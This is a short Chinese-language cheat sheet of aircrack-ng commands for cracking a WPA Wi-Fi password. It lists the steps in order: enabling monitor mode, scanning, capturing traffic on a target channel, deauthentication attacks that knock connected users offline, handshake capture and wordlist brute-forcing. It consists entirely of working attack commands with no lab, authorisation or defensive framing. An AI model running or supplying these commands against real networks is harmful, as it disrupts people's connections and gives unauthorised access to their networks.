载入网卡
airmon-ng start wlan0
开始监听
airodump-ng wlan0mon #扫描WIFI
监听指定目标频道
airodump-ng -c CH值 --bssid BSSID值 -w wifi wlan0mon
存在用户连接
反认证攻击断网
aireplay-ng -0 0 -a (BSSID) -c (STATION) wlan0mon
等待用户重连
抓取握手包
aireplay-ng -0 10 -a 路由器的bssid值 -c 目标mac地址 wlan0mon
爆破密码
aircrack-ng -a2 -b bssid -w /usr/share/seclists/wifi_top2000_passwd.txt text-01.cap